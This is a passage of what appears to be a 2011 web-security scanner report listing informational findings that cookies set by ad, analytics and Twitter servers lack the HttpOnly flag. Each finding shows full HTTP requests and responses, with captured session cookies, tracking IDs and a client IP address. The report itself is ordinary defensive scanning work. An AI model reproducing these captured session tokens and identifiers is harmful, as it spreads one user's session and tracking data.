ALBdNCwOFAiSK1bdi0nXrtknR3MMXhwwfPIzPaLXM+akKWNJAIcSh4PhAOFvqTKuFuDqkb2jqtMxvBdfAVFP7NcbvzKM+3/uuiZWRcF2CeeJ+flWQpzF+qS4BrI4Dt7AUZJ2EeFM3hYFUuM+b7FSC9tA/os4G3yWCotYZVrGvo54nzTqbUBprWjuZeCEFOQrhk39gvmKqik9/KpfzR5MiU0uLqBg4fajyELacRAGLnVGj+B7iteW8WMZEjeKmXBe07ucZRi9DpGErPDw6oq7W48eIvXekP4IC+FWJCPqTlvpuRnGVHMAgc2N/10uzlwIFyZU8xlBrKB09h8MsfXUFU/XriyVQk0iV2aXQykGDbTt7wXEZjVdp8Bg+8v79AqGFZFXHkpC6EnFo3jp0YNfEdmA+TtNo4qTVSUwILsHfJ1xPZDLAcyQmTDKNHxhrA2TUZakdD+b7KfaafZcpU="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUM1Iz9DOAYU1O2uA3Nf1wgg9Trn7P8K47EY+8nGql72A9rNu/WP+Yp2mpPygxIFQc/rlHGwyyG/2blenQfm1l0Q/iLSAjgPy6DOmNB2RidToi9fOv5uXgl8+4W0L5Ym5SS9akNrDlJkuTSEn1IzCzNjTywhnuZUD6LuLDI3Ub7pnknRg6DioQwaQWBI/Va9H+E6oAGKDoOkdEsbTdiXG0YLDJupGOL941dnqjjKA/tKwUiQ7Bg46i/2PEgcQGrjtDE8cREmclCxlJWKsd/4kBe220QCtR33/i+YiYxNLl11a2NeHERuz0/wtyg4B7wVzAxIr328AFdyG3OqCrt9Bss8gOMdglG+O8aLkC+XqiolL2z3YHeAtnVDXa4KKw1We9htczQ58f1/MGFXbDVpPs6WVRGu3+d5TCcU7yxQ7gKSdcw2h8rucA3ek3ms9do7g2wGQ4IAl0I1cn81AaowmHyzYOIPg1PyT+l0xKJZCRqqjo5TgwgO+/kXhACxeQ4RidxA9oz43XdB0IlE4K2AJSfqvAUc58BhHAK7sr4HZCqkLhQZyPg6Ip8jRGVSo19MvkgnZBhVdfI7td9lONwXbAiqOv0dBu1WgT3NcllONTos4/mZzgzFRWAFJvLRjBK0+6yBKRT+jieyboOkO+4xVqmrO/Ar4c5d1VTwLfBUF6D0BbDF0v9in35Iyo5OFSjJEB/0iMLPUVwhg35239Pd2hGJqg3X4ChYj/9Jzu9JzDnHq7XGQrhxR8hKZ9JsITQzwaf5Xp6L8CNvTM00skMxn4v0QN7OGYbiYaTRjXbBUNsd2c1JMgWmRXYAtR85D+z9c0B+kkUwZJMx45+HuZTwl1h98Wq2Vi+88RWyLIdaA1uhqGjqUUcMk/8RcMY1ZZ7bVEpoFmKPNbbffta1Hulv8HmTh6N2aOHgQzAzNGsR/ASaN5OZRN8nlrQj/3mLqK3PdQk1JaD1suhpMvEv4Ws+llCQBn4hBGD95pgc9YrBnJuzbXkcZ2fl27dkzem+EToIdBHC8Zs7eTFoCWnuWAPo234gSrmyO9h3wUPisKJP/iEGx+ZfaTRHusAxojdHgBZPVWnLnRMX/rExKb/q4ZfNfP5NH51TLP2xA3CWZaUes4c4uanbkwKntqp+uPTxw5qcuNxucC7vSNbUDZ9Ta1LhiitrPGSUJ2Ecgzj2d3TweX8ooHTl1HAtb0MP+KOWuoiznt63sse8jznEqCjX17SaGm9KBL0GJkp8M48eGwyyDYKFz0T4ESopltkXESByivxh69cV+stDhcg/oSfXwJwaItp7vsYlaMKIcddAdFCTqStm6l0ZR/ZaptMbYpL+KDItRKCRg+ccHvfqWumbv3zd1vdAyvlbXrrVxrU+uOjODfHrD8UH59LhZ18ntVw6ZS1hK7sBKy7ylMiHbBXT1CLkbvZA3yEPXVaMMdZjWNwu+A71b+1/H++HXYjWpcXLYVJx244iFFdiwEgRlnZiXLKdra7LEUfrdN0fQYrx+BKmbzKrhCdqeEJcp09XrcwUjfKA"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:32 GMT

GIF89a.............!.......,...........D..;
10.22. http://adserver.adtech.de/addyn%7C3.0%7C577%7C2951880%7C0%7C170%7CADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C577%7C2951880%7C0%7C170%7CADTECH

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /addyn%7C3.0%7C577%7C2951880%7C0%7C170%7CADTECH;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=700;misc=1304949833137 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB3681C6E651A440C6EAF39F00FE389; cookiename1=cookievalue1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: BsC=6233986=1304953636,;path=/
Content-Length: 1041

document.write("<scr"+"ipt src=\"http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2393594&PluID=0&w=300&h=250&ord=950036492&ucm=true&ncu=$$http://adserver.adtech.de/adlink|577|295188
...[SNIP]...
10.23. http://adserver.adtech.de/addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH;cfp=1;rndc=130495000;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=213;misc=1304950001207 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: adserver.adtech.de
Cookie: CfP=1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: JEB2=4DC7F3676E651A260C6EAF39F01058B1;expires=Wed, 8 May 2013 14:7:47 GMT;domain=adtech.de;path=/
Content-Length: 1897

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
10.24. http://adserver.adtech.de/bind  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /bind

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bind?ckey1=cookiename1;cvalue1=cookievalue1;expiresDays=90;adct=text/html;misc=123&_=1304949672673 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB3681C6E651A440C6EAF39F00FE389

Response

HTTP/1.0 200 OK
Connection: close
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: text/html
Content-Length: 1
Set-Cookie: cookiename1=cookievalue1;expires=Sun, 7 Aug 2011 14:3:53 GMT;domain=adtech.de;path=/

10.25. http://adserver.clashmusic.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.clashmusic.com
Path:   /www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=863&campaignid=427&zoneid=3&channel_ids=,&loc=http%3A%2F%2Fwww.clashmusic.com%2Fnews%2Fsufjan-stevens-suffered-nervous-breakdown&cb=798191f103 HTTP/1.1
Host: adserver.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2; OAID=efeacdd68792e9690c3d24ff4cb687f0

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:00 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=efeacdd68792e9690c3d24ff4cb687f0; expires=Tue, 08-May-2012 14:01:00 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
10.26. http://adserver.clashmusic.com/www/delivery/spc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.clashmusic.com
Path:   /www/delivery/spc.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/spc.php?zones=1%7C2%7C3%7C4%7C5%7C6&source=&r=45574794&channel=Content&charset=UTF-8&loc=http%3A//www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown HTTP/1.1
Host: adserver.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:04 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: OAID=ecb9c74daa43b3484fade1b28358feac; expires=Tue, 08-May-2012 14:01:04 GMT; path=/
Set-Cookie: OAID=5fec8ad52d31f0a75384afd76f497365; expires=Tue, 08-May-2012 14:01:04 GMT; path=/
Set-Cookie: OAID=5c40cd21561f31b2e699ebc8f21d2201; expires=Tue, 08-May-2012 14:01:04 GMT; path=/
Set-Cookie: OAID=795b26de8dfcd1435cded22c800a6da1; expires=Tue, 08-May-2012 14:01:04 GMT; path=/
Set-Cookie: OAID=3d584d8018c288be22cc491f2c3d20c8; expires=Tue, 08-May-2012 14:01:04 GMT; path=/
Set-Cookie: OAID=edd769b48ec55499c645df3c48a7102b; expires=Tue, 08-May-2012 14:01:04 GMT; path=/
P3P: CP="CUR ADM OUR NOR STA NID"
Content-Size: 3664
Content-Length: 3664
Connection: close
Content-Type: application/x-javascript; charset=UTF-8

var OA_output = new Array();
OA_output['1'] = '';
OA_output['1'] += "<"+"a href=\'http://adserver.clashmusic.com/www/delivery/ck.php?oaparams=2__bannerid=857__zoneid=1__cb=3f6275af56__oadest=http://w
...[SNIP]...
10.27. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://alvenda.122.2o7.net
Path:   /b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424?AQB=1&events=event4&c8=RubiconRemarketing_ThomsonReuters&c10=flash-expandable&c15=thomsonreuters&c12=rubicon&c13=www.thevine.com.au&c14=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&v8=RubiconRemarketing_ThomsonReuters&v10=flash-expandable&v12=thomsonreuters&v18=rubicon&v16=www.thevine.com.au&v17=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&AQE=1 HTTP/1.1
Host: alvenda.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|26E3F9A98514A256-6000018C80238AC6|4DC7F352[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9A98514A256-6000018C80238AC8|4DC7F352[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:06:50 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tycpx7Bqtax7Dzxxfzx7Bgpx60apgf=[CS]v4|0-0|4DC7F4FA[CE]; Expires=Sat, 7 May 2016 14:06:50 GMT; Domain=.2o7.net; Path=/
Location: http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424?AQB=1&pccr=true&&events=event4&c8=RubiconRemarketing_ThomsonReuters&c10=flash-expandable&c15=thomsonreuters&c12=rubicon&c13=www.thevine.com.au&c14=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&v8=RubiconRemarketing_ThomsonReuters&v10=flash-expandable&v12=thomsonreuters&v18=rubicon&v16=www.thevine.com.au&v17=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 14:06:50 GMT
Last-Modified: Tue, 10 May 2011 14:06:50 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www290
Content-Length: 0
Content-Type: text/plain

10.28. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?screen_name=OSentinelBiz&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=5&clientsource=TWITTERINC_WIDGET&1304949572397=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304949575-25240-22084
X-RateLimit-Limit: 150
ETag: "98aaceed48e4ccd42b79709e9f443154"-gzip
Last-Modified: Mon, 09 May 2011 13:59:35 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.02358
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 4477c3eabd09e879d2fca4f211d0ecb1dcbd8643
X-RateLimit-Reset: 1304953175
Set-Cookie: original_referer=ZLhHHTiegr8aia0pL5vMr3kk%2BX%2BcqR3rsxppA%2FovyVCexTmcz%2FMvOkAXJR%2BHAK6zSrw43nllCDgN7RfPnnkGWrD0tlGHXcKgXzEfbM%2FnZyY2aQU3pk7AwQ%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCHpODtUvAToHaWQiJTRlZDg4ODBjZGUyYTBl%250ANDIwNTIwZGMzMTllNmI5N2M0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--f79c0141fe922e790699a68ff50019e9d67d29da; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 8808

TWTR.Widget.receiveCallback_1([{"text":"How local stations will cover #CaseyAnthony trial. http:\/\/bit.ly\/m7l2jo #media","coordinates":null,"truncated":false,"id_str":"67586194652930048","source":"w
...[SNIP]...
10.29. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/statuses/user_timeline.json?screen_name=clash_music&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=3&clientsource=TWITTERINC_WIDGET&1304949966734=cachebust HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: api.twitter.com

Response

HTTP/1.0 400 Bad Request
Date: Mon, 09 May 2011 14:07:38 GMT
Server: hi
Status: 400 Bad Request
X-RateLimit-Limit: 150
X-RateLimit-Remaining: 0
X-Runtime: 0.00679
Content-Type: application/json; charset=utf-8
Content-Length: 306
X-RateLimit-Class: api
Cache-Control: no-cache, max-age=300
X-RateLimit-Reset: 1304953175
Set-Cookie: k=173.193.214.243.1304950057993657; path=/; expires=Mon, 16-May-11 14:07:37 GMT; domain=.twitter.com
Set-Cookie: guest_id=130495005799789295; path=/; expires=Wed, 08 Jun 2011 14:07:37 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCA6sFdUvAToHaWQiJTI1NzM4ZGNiNzM3ZmRj%250AMWYyNzZmY2FhM2E1MTViMmRiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--46243618f4526801b6b817f75048101c30bc6cbc; domain=.twitter.com; path=/; HttpOnly
Expires: Mon, 09 May 2011 14:12:37 GMT
Connection: close

TWTR.Widget.receiveCallback_1({"request":"\/1\/statuses\/user_timeline.json?screen_name=clash_music&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=3&clientsource=TWITTERINC_WIDGET&13049
...[SNIP]...
10.30. http://ar.atwola.com/atd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.atwola.com
Path:   /atd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /atd HTTP/1.1
Host: ar.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cords=MToxMzA0NTU3MDI2OjcsMTMwNDU1NzAyNg==

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 13:59:55 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8l DAV/2
Expires: Mon, 09 May 2011 13:59:55 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURo DEVo TAIo PSAo IVAo IVDo LOC ONL UNI COM NAV INT STA DEM OUR"
Set-Cookie: cords=MToxMzA0OTQ5NTk1OjcsMTMwNDk0OTU5NQ==; domain=.ar.atwola.com; path=/; expires=Tue, 06 Sep 2011 13:59:55 GMT
Location: http://r.nexac.com/e/getdata.xgi?dt=br&pkey=jtkr94hrnfw22&ru=http://ar.atwola.com/atd?it=7%26iv=%3cna_di%3e%26ds%3d7%26ed%3d%3cna_da%3e%26rand=713403
Content-Length: 0
Content-Type: text/plain

10.31. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1304949586.006,wait-%3E10000,&1304949587809 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:45 2011&prad=256163696&arc=206438267&; BMX_G=method->-1,ts->1304949585; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:47 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304949586%2E006%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;
10.32. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:45 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:45 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949585; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
